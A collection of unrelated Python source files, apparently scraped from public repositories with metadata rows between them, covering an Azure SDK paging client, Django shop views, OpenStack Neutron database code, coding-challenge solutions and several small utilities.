# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Optional, TypeVar
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._backup_protection_containers_operations import build_list_request
from .._vendor import RecoveryServicesBackupClientMixinABC
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class BackupProtectionContainersOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.recoveryservicesbackup.activestamp.aio.RecoveryServicesBackupClient`'s
:attr:`backup_protection_containers` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(
self, vault_name: str, resource_group_name: str, filter: Optional[str] = None, **kwargs: Any
) -> AsyncIterable["_models.ProtectionContainerResource"]:
"""Lists the containers registered to Recovery Services Vault.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param filter: OData filter options. Default value is None.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProtectionContainerResource or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionContainerResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version))
cls: ClsType[_models.ProtectionContainerResourceList] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
filter=filter,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ProtectionContainerResourceList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupProtectionContainers"
}
| [
"noreply@github.com"
] | Azure.noreply@github.com |
f13aa73d31a2841260ea3b48e0adb7200deb0fda | d8fe3b5243bec2b61fd7907c4ff799b24bb617e5 | /Bloomberg_codecon/General_challenger_problems/mug_color.py | 65d046ed2e35e926aa298629faa04dc9adabde17 | [
"Unlicense"
] | permissive | SelvorWhim/competitive | b89ed252512d88d9346d168dc6b48e0a42a6142d | 1c73a5c7b2d0dc1b6c4f3f06ace69cdf5c6a34c0 | refs/heads/master | 2023-04-13T01:02:52.083519 | 2023-04-11T10:14:38 | 2023-04-11T10:14:38 | 96,573,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,927 | py | ### INSTRUCTIONS ###
'''
Jay S. has got himself in trouble! He had borrowed a friend's coffee mug and somehow lost it. As his friend will be extremely angry when he finds out about it, Jay has decided to buy his friend a replacement mug to try to control the damage.
Unfortunately, Jay does not remember the color of the mug he had borrowed. He only knows that the color was one of White, Black, Blue, Red or Yellow.
Jay goes around his office asking his colleagues if they are able to recall the color but his friends don't seem to remember the color of the mug either. What they do know is what color the mug definitely was not.
Based on this information, help Jay figure out what the color of the mug was.
> Input Specifications
Your program will take
An input N (1 <= N <= 1,000,000) which denotes the number of people Jay questions regarding the mug.
This will be followed by N strings S[1],S[2]...S[N] where S[I] denotes the response of person I to Jay's question which is what color the mug definitely was not. S[I] will also be only one of the 5 colors namely White, Black, Blue, Red or Yellow.
> Output Specifications
Based on the input, print out the color of the mug. The color of the mug can only be one of the 5 colors namely White, Black, Blue, Red or Yellow.
You can safely assume that there always exists only one unique color that the mug can have.
'''
### MY SOLUTION (accepted) ###
#Problem : Mug Color
#Language : Python 3
#Compiled Using : py_compile
#Version : Python 3.4.3
#Input for your program will be provided from STDIN
#Print out all output from your program to STDOUT
import sys
colors=['White', 'Black', 'Blue', 'Red', 'Yellow']
data = sys.stdin.read().splitlines()
N = int(data[0])
for color in data[1:] :
if color in colors:
colors.remove(color)
print(colors[0]) # assumed exactly one remains. If more, will be first available. If none, error. | [
"Carmeverre@gmail.com"
] | Carmeverre@gmail.com |
3d53fe5bfcc78cbe0f91bd04f98035197e584aa3 | d7ccb4225f623139995a7039f0981e89bf6365a4 | /.history/store/views_20211011174414.py | b3aa780e17766d12a299e017068f39c7ef8a9c6c | [] | no_license | tonnymuchui/django-mall | 64fd4abc3725c1bd0a3dcf20b93b490fe9307b37 | 55c083d8433be3c77adc61939cd197902de4ce76 | refs/heads/master | 2023-08-23T04:59:20.418732 | 2021-10-13T15:59:37 | 2021-10-13T15:59:37 | 415,668,388 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,356 | py | from django.shortcuts import get_object_or_404, render
from store.models import Product
from category.models import Category
from carts.views import _cart_id
from carts.models import CartItem
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
# Create your views here.
def store(request, category_slug=None):
categories = None
products = None
if category_slug is not None:
categories = get_object_or_404(Category, slug=category_slug)
products = Product.objects.filter(category=categories, is_available=True)
products_count = products.count()
else:
products = Product.objects.all().filter(is_available=True)
products_count = products.count()
content = {
'products': products,
'products_count': products_count,
}
return render(request, 'store/store.html', content)
def product_detail(request, category_slug, product_slug):
try:
single_product = Product.objects.get(category__slug=category_slug, slug=product_slug)
in_cart = CartItem.objects.filter(cart__cart_id=_cart_id(request), product=single_product).exists()
except Exception as e:
raise e
content = {
'single_product': single_product,
'in_cart': in_cart,
}
return render(request, 'store/product_detail.html', content) | [
"tonykanyingah@gmail.com"
] | tonykanyingah@gmail.com |
37170c7468eb730c386bcbb10eae65fbcf0897c5 | b8a13ecb7c0999954807e80c7470d8f752a3653b | /LearnPythonTheHardWay/Python3/ex13-more.py | 6ebf367feb72eaf15feceea90b4b64c2e17c6b07 | [] | no_license | jbarcia/Python-Books | 59ca3d7b7fb1f2c1e3d1659f846032382af557a9 | 2106a2e5f56cdd4261bf870798a0a427d6137249 | refs/heads/master | 2021-01-19T00:24:59.727307 | 2017-01-05T00:07:13 | 2017-01-05T00:07:13 | 62,562,390 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | #!/bin/python3
# ex13: Parameters, Unpacking, Variables
# Write a script that has more arguments.
from sys import argv
script, name, age, height, weight = argv
print("The script is called:", script)
print("Your name is:", name)
print("Your age is:", age)
print("Your height is %d inches" % int(height))
print("Your weight is %d pounds" % int(weight))
| [
"jbarcia99@yahoo.com"
] | jbarcia99@yahoo.com |
2672ebf95d24a74fd6bfb9c7ca5948697ef1cc80 | b3fa4bb31add76bbff0b6f864f433ff9af7897b6 | /109.sortedListToBST.py | 751ed76c2ec1801eb87a6f002d30123f3f262fbb | [] | no_license | Aissen-Li/LeetCode | 7298225ba95d58194a5fc87c7ee3ef4d04ec4d4b | f08628e3ce639d1e3f35a2bd3af14cc2b67d7249 | refs/heads/master | 2020-12-30T08:03:17.277924 | 2020-09-25T08:20:53 | 2020-09-25T08:20:53 | 238,919,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 834 | py | # Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def sortedListToBST(self, head: ListNode) -> TreeNode:
slow, fast = head ,head
leftEnd = None
while fast and fast.next:
leftEnd = slow
slow = slow.next
fast = fast.next.next
if head == slow:
return TreeNode(slow.val)
root = TreeNode(slow.val)
if leftEnd:
leftEnd.next = None
rightStart = slow.next
root.left = self.sortedListToBST(head)
root.right = self.sortedListToBST(rightStart)
return root | [
"aissen_f@163.com"
] | aissen_f@163.com |
adf993aa0cb6b57623219bbff2eea82c09956c47 | dddbfd8eb6dff0bd3449bac87ee76b5c3e0bdfb1 | /icehouse-patches/neutron/vlan2vlan/neutron/db/cascade_db.py | d3e520ea4be1bb85b014269fd52aa828589bc05c | [
"Apache-2.0"
] | permissive | joey5678/tricircle | 40897fed8fe9d6772e8878b4f06ba1a829636488 | e211f7efef129bbfb038cc05232ea1de33f82a97 | refs/heads/master | 2021-01-17T21:04:32.945469 | 2014-11-17T09:46:29 | 2014-11-17T10:10:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,542 | py | '''
Created on 2014-8-5
@author: j00209498
'''
from oslo.db import exception as db_exc
import sqlalchemy as sa
from neutron.api.rpc.agentnotifiers import l3_rpc_agent_api
from neutron.common import exceptions as q_exc
from neutron.common import log
from neutron.common import utils
from neutron.db import model_base
from neutron.extensions import dvr as ext_dvr
from neutron import manager
from neutron.openstack.common import log as logging
from oslo.config import cfg
from sqlalchemy.orm import exc
LOG = logging.getLogger(__name__)
big2layer_vni_opts = [
cfg.StrOpt('big2layer_vni_range',
default="4097:20000",
help=_('The big 2 layer vxlan vni range used for '
'CascadeDBMixin instances by Neutron')),
]
cfg.CONF.register_opts(big2layer_vni_opts)
class CascadeAZNetworkBinding(model_base.BASEV2):
"""Represents a v2 neutron distributed virtual router mac address."""
__tablename__ = 'cascade_az_network_bind'
network_id = sa.Column(sa.String(36), primary_key=True, nullable=False)
host = sa.Column(sa.String(255), primary_key=True, nullable=False)
class CascadeRouterAZExternipMapping(model_base.BASEV2):
"""Represents a v2 neutron distributed virtual router mac address."""
__tablename__ = 'cascade_router_az_externip_map'
router_id = sa.Column(sa.String(36), primary_key=True, nullable=False)
host = sa.Column(sa.String(255), primary_key=True, nullable=False)
extern_ip = sa.Column(sa.String(64), nullable=False)
class CascadeDBMixin(object):
@property
def l3_rpc_notifier(self):
if not hasattr(self, '_l3_rpc_notifier'):
self._l3_rpc_notifier = l3_rpc_agent_api.L3AgentNotifyAPI()
return self._l3_rpc_notifier
def is_big2layer_vni(self, seg_id):
vni = cfg.CONF.big2layer_vni_range.split(':')
if(seg_id >= int(vni[0]) and seg_id <= int(vni[1])):
return True
else:
return False
def get_binding_az_by_network_id(self, context, net_id):
try:
query = context.session.query(CascadeAZNetworkBinding)
ban = query.filter(
CascadeAZNetworkBinding.network_id == net_id).one()
except exc.NoResultFound:
return None
return ban['host']
def add_binding_az_network_id(self, context, binding_host, net_id):
try:
with context.session.begin(subtransactions=True):
dvr_mac_binding = CascadeAZNetworkBinding(
network_id=net_id, host=binding_host)
context.session.add(dvr_mac_binding)
LOG.debug("add az_host %(host)s for network %(network_id)s ",
{'host': binding_host, 'network_id': net_id})
except db_exc.DBDuplicateEntry:
LOG.debug("az_host %(host)s exists for network %(network_id)s,"
" DBDuplicateEntry error.",
{'host': binding_host, 'network_id': net_id})
def get_extern_ip_by_router_id_and_host(self, context, router_id, host):
rae = self.get_router_az_extern_ip_mapping(context, router_id, host)
if(rae):
return rae['extern_ip']
return None
# try:
# query = context.session.query(CascadeRouterAZExternipMapping)
# erh = query.filter(
# CascadeRouterAZExternipMapping.router_id == router_id,
# CascadeRouterAZExternipMapping.host == host).one()
# except exc.NoResultFound:
# return None
# return erh['extern_ip']
def get_router_az_extern_ip_mapping(self, context, router_id, host):
try:
query = context.session.query(CascadeRouterAZExternipMapping)
erh = query.filter(
CascadeRouterAZExternipMapping.router_id == router_id,
CascadeRouterAZExternipMapping.host == host).one()
except exc.NoResultFound:
return None
return erh
def update_router_az_extern_ip_mapping(self, context, router_id,
host, extern_ip):
if extern_ip is None:
self.del_router_az_extern_ip_mapping(context, router_id, host)
self.l3_rpc_notifier.routers_updated(context, [router_id],
None, None)
return
rae = self.get_router_az_extern_ip_mapping(context, router_id, host)
if(rae and rae['extern_ip'] != extern_ip):
update_rae = {}
update_rae['router_id'] = rae['router_id']
update_rae['host'] = rae['host']
update_rae['extern_ip'] = extern_ip
rae.update(update_rae)
LOG.debug("update extern_ip %(extern_ip)s for az_host %(host)s "
"and router %(router_id)s ",
{'extern_ip': extern_ip,
'host': host,
'network_id': router_id})
self.l3_rpc_notifier.routers_updated(context, [router_id],
None, None)
return
try:
with context.session.begin(subtransactions=True):
router_az_extern_ip_map = CascadeRouterAZExternipMapping(
router_id=router_id, host=host, extern_ip=extern_ip)
context.session.add(router_az_extern_ip_map)
LOG.debug("add extern_ip %(extern_ip)s for az_host %(host)s "
"and router %(router_id)s ",
{'extern_ip': extern_ip,
'host': host,
'network_id': router_id})
self.l3_rpc_notifier.routers_updated(context, [router_id],
None, None)
except db_exc.DBDuplicateEntry:
LOG.debug("DBDuplicateEntry ERR:update extern_ip %(extern_ip)s "
"for az_host %(host)s and router %(router_id)s ",
{'extern_ip': extern_ip,
'host': host,
'network_id': router_id})
def del_router_az_extern_ip_mapping(self, context, router_id, host):
try:
query = context.session.query(CascadeRouterAZExternipMapping)
query.filter(
CascadeRouterAZExternipMapping.router_id == router_id,
CascadeRouterAZExternipMapping.host == host).delete()
except exc.NoResultFound:
return None
| [
"joehuang@huawei.com"
] | joehuang@huawei.com |
ca537def844347b897bbf7d508e7ed1b36881424 | 5d6fa3466d9fa8bd6719c6dea586163d3d089090 | /codes/CHAPTER_3/Chapter_3.5_Error_Handling/Lesson_3/3.5.3_TryExcept2.py | 7dddad2dacf6be45dfd851d778977a7fca8af2a4 | [] | no_license | harveylabis/GTx_CS1301 | cff0c1a076b1da73c66d53175330b4dedc244163 | f26a5e9c4b8c29acb831444cd59d21524267825c | refs/heads/master | 2023-06-26T14:44:38.976288 | 2021-08-02T04:20:31 | 2021-08-02T04:20:31 | 269,361,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | mystery_value = 9
#You may modify the lines of code above, but don't move them!
#When you Submit your code, we'll change these lines to
#assign different values to the variables.
#Create a program that divides 10 by mystery_value and prints
#the result. In the case that mystery_value is equal to 0,
#print "Not possible". Do not catch any other errors. This
#means there will be an uncaught error in the correct answer!
#
#You may not use any conditionals or the type() function.
#Add your code here!
try:
print(10/mystery_value)
except ZeroDivisionError:
print("Not possible")
| [
"harveyabiagador@gmail.com"
] | harveyabiagador@gmail.com |
9077243272380d510bf5f7fc9d920155d1ce0b61 | 239c34e56a2b586ae6618c1ccbba7e668a28fc6d | /salt/runners/error.py | 9bffab178e87891343acebb2e20fbfef0018b68f | [
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | georgiou/salt | 076ce8e62289910af960f8e45ab8c3e0131943f2 | 4a3b930e4f2a8bfcdd9d18c3fef9cb1eb806a3f5 | refs/heads/develop | 2023-09-03T10:39:01.309513 | 2014-03-07T15:49:29 | 2014-03-07T15:49:29 | 17,520,119 | 0 | 0 | NOASSERTION | 2023-09-06T17:29:01 | 2014-03-07T16:32:38 | Python | UTF-8 | Python | false | false | 616 | py | # -*- coding: utf-8 -*-
'''
Error generator to enable integration testing of salt runner error handling
'''
# Import python libs
# Import salt libs
import salt.utils.error
def error(name=None, message=''):
'''
If name is None Then return empty dict
Otherwise
Raise an exception with __name__ from name, message from message
CLI Example:
.. code-block:: bash
salt-run error
salt-run error.error name="Exception" message="This is an error."
'''
ret = {}
if name is not None:
salt.utils.error.raise_error(name=name, message=message)
return ret
| [
"smith.samuel.m@gmail.com"
] | smith.samuel.m@gmail.com |
c0413f4a1638ff5d986ce54f0cb09762125edb75 | c5b9c54492cdf591a2190364e7bfb1041b63c218 | /Selenium_pratice/PRATICE.py | 0aa9ed5795198786069df71cfd606f54389195ae | [] | no_license | QAvinod/Interview_Question_Examples | 43f7fb46f497415a8b30a8c6c5f13d2cbf6055b4 | f4f6d2c4e4fcc536de5656db30021f416959cce8 | refs/heads/master | 2023-06-13T04:18:12.218130 | 2021-07-06T10:29:10 | 2021-07-06T10:29:10 | 331,185,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 488 | py | from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.service import Service
def xpath_types():
a = 1
service = Service(executable_path=ChromeDriverManager().install())
opt = webdriver.ChromeOptions()
opt.add_argument("--start-maximized")
driver = webdriver.Chrome(service=service, options=opt)
driver.get('https://www.amazon.in/')
assert a == 1
if __name__ == '__main__':
xpath_types()
| [
"Vinod-E"
] | Vinod-E |
a38cbb263b8e8f152f0c49822ead89c1c46ab177 | 551ef0567aca428a535775d3949f5d9670c0d29c | /arc/arc003/b/main.py | a12ea26e888cccfd2ec1bc149e4cebdf993c7f4b | [] | no_license | komo-fr/AtCoder | 7451a9402466ce8d487d0c521128732061c647df | c916889294cb12f21e74254de43b3e17e1b354bc | refs/heads/master | 2023-07-22T07:05:52.955188 | 2023-03-01T14:22:16 | 2023-03-01T14:22:16 | 213,109,943 | 0 | 0 | null | 2023-07-06T22:01:28 | 2019-10-06T04:44:49 | Python | UTF-8 | Python | false | false | 201 | py | #!/usr/bin/env python3
N = int(input().split()[0])
s_list = []
for _ in range(N):
s = input()
s = s[::-1]
s_list.append(s)
ans = "\n".join([s[::-1] for s in sorted(s_list)])
print(ans)
| [
"komo.mdrms@gmail.com"
] | komo.mdrms@gmail.com |
7367eeebaef104b7ba3efa04c721a5f60349632d | 7c15f211adc9e9eb9f66ccdd570c9f38dff7ea8d | /packages/autorest.python/test/vanilla/legacy/Expected/AcceptanceTests/ClientEnum/clientenum/_vendor.py | 3b000a3b496306b693b088034c588b9e6b4b3a76 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | Azure/autorest.python | cc4bfbf91ae11535731cad37cedd6b733edf1ebd | a00d7aaa3753ef05cb5a0d38c664a90869478d44 | refs/heads/main | 2023-09-03T06:58:44.246200 | 2023-08-31T20:11:51 | 2023-08-31T20:11:51 | 100,315,955 | 47 | 40 | MIT | 2023-09-14T21:00:21 | 2017-08-14T22:58:33 | Python | UTF-8 | Python | false | false | 1,302 | py | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from abc import ABC
from typing import TYPE_CHECKING
from azure.core.pipeline.transport import HttpRequest
from ._configuration import ClientWithEnumConfiguration
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core import PipelineClient
from ._serialization import Deserializer, Serializer
def _convert_request(request, files=None):
data = request.content if not files else None
request = HttpRequest(method=request.method, url=request.url, headers=request.headers, data=data)
if files:
request.set_formdata_body(files)
return request
class ClientWithEnumMixinABC(ABC):
"""DO NOT use this class. It is for internal typing use only."""
_client: "PipelineClient"
_config: ClientWithEnumConfiguration
_serialize: "Serializer"
_deserialize: "Deserializer"
| [
"noreply@github.com"
] | Azure.noreply@github.com |
ee35ec61d28c96933eeefced4425bbb07e904ab5 | c27862cc24513c1d1c221e07c261b9fe65a37f54 | /logging_moudle/A_test.py | 50b540b5b19a23cdb07ccb383f965a24b6193b9c | [] | no_license | MannixZ/Mannix | ac62ef29c1dcbb513b121ad9d42db851103884fc | 7b86d0a619e0d6e3eecb94331ee60d89542b99f2 | refs/heads/master | 2020-05-26T13:27:24.979334 | 2019-05-23T14:10:47 | 2019-05-23T14:10:47 | 164,109,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from logging_moudle.main import setup_logging
# logger = logging.getLogger('main.A_test')
def compler():
a = 3
b = 2
if a > b:
logging.info("++++++%s %s", a, b)
def hahaha():
logging.info('__________')
if __name__ == '__main__':
setup_logging()
compler()
hahaha() | [
"noreply@github.com"
] | MannixZ.noreply@github.com |
13f6ebcb96f77e6bd120053c29a06acd5afdee72 | f513c794fd95cb72ee776029ece38a08c4b4da0b | /corehq/apps/cleanup/management/commands/reprocess_error_forms.py | efe1b59229228cce7b52b8ed4af54578c3020968 | [] | no_license | bglar/commcare-hq | a92f034a0c2faf787da8321b4d79e55f098bd89f | 972129fc26864c08c7bef07874bd2a7218550bff | refs/heads/master | 2021-05-28T20:44:12.876151 | 2015-01-16T16:23:52 | 2015-01-16T16:23:52 | 29,391,363 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,217 | py | from collections import defaultdict
from django.core.management.base import BaseCommand, CommandError, LabelCommand
from casexml.apps.case.util import reprocess_form_cases
from corehq.apps.cleanup.xforms import iter_problem_forms
from optparse import make_option
from dimagi.utils.parsing import string_to_datetime
class Command(BaseCommand):
args = '<domain> <since>'
help = ('Reprocesses all documents tagged as errors and tries to '
'regenerate the appropriate case blocks for them. Can pass in '
'a domain and date to process forms received after that date or '
'just a domain to process all problem forms in the domain.')
option_list = LabelCommand.option_list + \
(make_option('--dryrun', action='store_true', dest='dryrun', default=False,
help="Don't do the actual reprocessing, just print the ids that would be affected"),)
def handle(self, *args, **options):
domain = since = None
if len(args) == 1:
domain = args[0]
elif len(args) == 2:
domain = args[0]
since = string_to_datetime(args[1])
else:
raise CommandError('Usage: %s\n%s' % (self.args, self.help))
succeeded = []
failed = []
error_messages = defaultdict(lambda: 0)
for form in iter_problem_forms(domain, since):
print "%s\t%s\t%s\t%s\t%s" % (form._id, form.received_on,
form.xmlns,
form.xpath('form/meta/username'),
form.problem.strip())
if not options["dryrun"]:
try:
reprocess_form_cases(form)
except Exception, e:
failed.append(form._id)
error_messages[str(e)] += 1
else:
succeeded.append(form._id)
print "%s / %s forms successfully processed, %s failures" % \
(len(succeeded), len(succeeded) + len(failed), len(failed))
if error_messages:
print "The following errors were seen: \n%s" % \
("\n".join("%s: %s" % (v, k) for k, v in error_messages.items()))
| [
"droberts@dimagi.com"
] | droberts@dimagi.com |
ed04c0cece483566e3d392dbc7e8b59f228424c2 | bd37e10ba5aa2e241c82c0f707e832e2d2c98448 | /delivery_app/administrators/apps.py | 41d1adfdf06d8d58d39eb0047eb6dcb2c11de41e | [] | no_license | DmitriyBul/DimkaDeliveryApp | 9d88aaf733fee5345fe1ff0ca4a83242b3ca73c4 | 22fe0229bbd17e978bdc279751e41c98584a0e44 | refs/heads/main | 2023-08-23T16:34:42.470321 | 2021-11-05T07:06:40 | 2021-11-05T07:06:40 | 402,777,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 160 | py | from django.apps import AppConfig
class AdministratorsConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'administrators'
| [
"128dmitriy128@gmail.com"
] | 128dmitriy128@gmail.com |
96b7f757a6988a25b6d5ad78d76e2389fa42424d | bfe6c95fa8a2aae3c3998bd59555583fed72900a | /gcdSort.py | 97870c2ccb58fb7d3bff9a961af1faed1095b64f | [] | no_license | zzz136454872/leetcode | f9534016388a1ba010599f4771c08a55748694b2 | b5ea6c21bff317884bdb3d7e873aa159b8c30215 | refs/heads/master | 2023-09-01T17:26:57.624117 | 2023-08-29T03:18:56 | 2023-08-29T03:18:56 | 240,464,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,658 | py | from typing import List
class Solution:
def gcdSort(self, nums: List[int]) -> bool:
parent = [i for i in range(10**5 + 1)]
# parent=[i for i in range(30)]
def find(loc):
while parent[loc] != loc:
loc = parent[loc]
return loc
def merge(loc1, loc2):
p1 = find(loc1)
p2 = find(loc2)
parent[max(p1, p2)] = min(p1, p2)
prime = [
2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61,
67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137,
139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,
211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277,
281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359,
367, 373, 379, 383, 389, 397, 401, 409
]
for num in nums:
tmp = num
for i in range(len(prime)):
if prime[i] * prime[i] > num:
break
if tmp % prime[i] != 0:
continue
while tmp % prime[i] == 0:
tmp //= prime[i]
# print('merge',prime[i],num)
merge(prime[i], num)
if tmp > 1:
merge(tmp, num)
# print(parent)
nums1 = nums.copy()
nums.sort()
for i in range(len(nums)):
if find(nums[i]) != find(nums1[i]):
return False
return True
nums = [7, 21, 3]
nums = [5, 2, 6, 2]
nums = [10, 5, 9, 3, 15]
print(Solution().gcdSort(nums))
| [
"zzz136454872@163.com"
] | zzz136454872@163.com |
d902870ae9a1873fa7213787d5d72768ad6ec3af | dfc61cfb4e6e93c4143250691ff8279790451e59 | /ask-sdk-model/ask_sdk_model/interfaces/alexa/presentation/html/__init__.py | e9fd9971909fcd092b9687de32b0104f419ab99b | [
"Apache-2.0"
] | permissive | Shreyas-vgr/alexa-apis-for-python | 5c2444238ace749fc89c604e4a194cb0bf31ef78 | 74ea73b3b6a03fd9cb735fb8c1fb2bd961faab54 | refs/heads/master | 2020-11-26T04:48:25.302742 | 2019-12-19T03:35:26 | 2019-12-19T03:41:40 | 228,967,736 | 1 | 0 | Apache-2.0 | 2019-12-19T03:30:10 | 2019-12-19T03:30:10 | null | UTF-8 | Python | false | false | 1,091 | py | # coding: utf-8
#
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License'). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
from __future__ import absolute_import
from .transformer_type import TransformerType
from .handle_message_directive import HandleMessageDirective
from .transformer import Transformer
from .runtime import Runtime
from .start_request_method import StartRequestMethod
from .start_request import StartRequest
from .message_request import MessageRequest
from .configuration import Configuration
from .start_directive import StartDirective
from .alexa_presentation_html_interface import AlexaPresentationHtmlInterface
| [
"ask-pyth@dev-dsk-ask-sdk-python-2b-85d79f62.us-west-2.amazon.com"
] | ask-pyth@dev-dsk-ask-sdk-python-2b-85d79f62.us-west-2.amazon.com |
e69877e2f09786585a92a0ab3dbd3905b3ce3ce5 | cf297c3d66189d2bd9fd8bfdadaeff3ebe6eee05 | /WebBrickLibs/EventHandlers/tests/TestUtils.py | 156b35af8887add2352285a3dd71cb50154673ab | [
"BSD-3-Clause"
] | permissive | AndyThirtover/wb_gateway | 0cb68a1f2caf7f06942f94b867ea02f4f8695492 | 69f9c870369085f4440033201e2fb263a463a523 | refs/heads/master | 2022-01-19T00:07:20.456346 | 2022-01-05T21:08:16 | 2022-01-05T21:08:16 | 14,687,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,332 | py | # Copyright L.P.Klyne 2013
# Licenced under 3 clause BSD licence
# $Id: TestUtils.py 3222 2009-07-14 15:32:00Z simon.hughes $
#
# Some test helpers for testing event handlers. Uses a SuperGlobal to save state.
#
import sys
import unittest
from EventLib.Event import Event, makeEvent
from EventHandlers.Utils import *
class TestUtilsUnit(unittest.TestCase):
def setUp(self):
self._log = logging.getLogger( "TestUtils" )
self._log.debug( "\n\nsetUp" )
def tearDown(self):
self._log.debug( "\n\ntearDown" )
# Actual tests follow
def testMakeEvent(self):
self._log.debug( "\ntestMakeEvent" )
newEvent = makeNewEvent(
{ 'type':'newtype',
'source':'newsource',
'other_data':{'data':'data','data1':'data1','data2':'data2' },
'copy_other_data':{'data1':'data1', 'data2':'data2' }
},
makeEvent('oldType', 'oldSource', {'data1':'olddata1'} ),
{'data2':'xtradata2'} )
self.assertNotEqual( newEvent, None)
self.assertEqual( newEvent.getType(), "newtype" )
self.assertEqual( newEvent.getSource(), "newsource" )
od = newEvent.getPayload()
self.assertEqual( od['data'], "data" )
self.assertEqual( od['data1'], "olddata1" )
self.assertEqual( od['data2'], "xtradata2" )
